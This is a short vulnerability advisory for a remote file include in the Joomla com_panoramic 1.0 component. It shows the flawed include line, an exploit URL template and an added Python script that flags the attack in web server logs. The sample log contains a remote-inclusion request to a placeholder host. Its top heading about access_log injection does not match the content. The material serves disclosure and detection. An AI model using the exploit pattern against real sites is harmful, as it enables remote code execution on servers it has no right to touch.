LFI to RCE via access_log injection

Joomla Component Panoramic Ver 1.0 - RFI


[o] panoramic joomla component 1.0 Remote File Include Vulnerability
Software : com_panoramic version 1.0
Download : http://www.webmaster-tips.net/
Author : NoGe


[o] Vulnerable file
administrator/components/com_panoramic/admin.panoramic.php
line 3: include( "$mosConfig_live_site/components/com_panoramic/about.html" );


[o] Exploit
http://localhost/path/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=[evilcode]


[o] Publish
http://milw0rm.com/exploits/4489
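
[o] Detection (added example, not part of the original advisory)
The script below scans web server logs for requests that pass mosConfig_live_site in the query string of a com_panoramic file, which is the pattern shown under Exploit. It assumes Apache common/combined log format; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Added example: names and sample data are hypothetical/constructed.
# Assumes Apache common/combined log format. POST bodies are not logged,
# so only query-string overrides are visible to this check.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*:', re.I)  # http:, ftp:, php:, data:
PARAM = "mosConfig_live_site"  # exact match: PHP variable names are case-sensitive
COMPONENT = "/components/com_panoramic/"


def classify(line):
    """Return (ip, status, verdict) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    try:
        parts = urlsplit(m["target"])
    except ValueError:  # malformed request target
        return None
    if COMPONENT not in parts.path:
        return None
    # parse_qsl percent-decodes names and values once, as PHP does.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == PARAM:
            # A config variable never legitimately arrives in a request.
            verdict = "remote-url" if SCHEME_RE.match(value) else "override"
            return (m["ip"], m["status"], verdict)
    return None


def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample entries (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2007:13:55:36 +0000] "GET /path/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=http%3A%2F%2Fhost.example%2Fx HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Oct/2007:13:56:02 +0000] "GET /path/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=test HTTP/1.1" 200 431',
    '192.0.2.10 - - [10/Oct/2007:13:57:11 +0000] "GET /path/administrator/index2.php?option=com_panoramic HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

A "remote-url" verdict means the supplied value carries a URL scheme; "override" means the parameter was set to something else, which is still worth reviewing because the variable should only come from the site configuration.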


